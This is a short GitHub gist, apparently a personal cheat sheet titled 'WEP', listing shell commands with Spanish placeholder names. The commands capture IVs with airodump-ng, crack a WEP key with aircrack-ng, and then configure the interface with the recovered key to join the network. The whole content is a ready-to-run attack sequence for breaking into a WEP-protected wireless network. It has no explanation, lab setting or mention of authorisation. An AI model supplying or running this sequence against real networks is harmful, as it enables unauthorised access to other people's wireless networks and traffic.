Skip to content

Instantly share code, notes, and snippets.

@cmaureir
Created March 26, 2013 15:06
Show Gist options
  • Save cmaureir/5246064 to your computer and use it in GitHub Desktop.
Save cmaureir/5246064 to your computer and use it in GitHub Desktop.
WEP
ifconfig wlan0 down
airodump-ng --ivs -w NOMBRE_ARCHIVO wlan0
airodump-ng --ivs -w NOMBRE_ARCHIVO wlan0 --channel CANAL
aircrack-ng -a 1 NOMBRE_ARCHIVO.ivs
iwconfig wlan0 essid NOMBRE_RED
iwconfig wlan0 key XXXXXXXXXXXX
ifconfig wlan0 up
dhcpcd wlan0
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment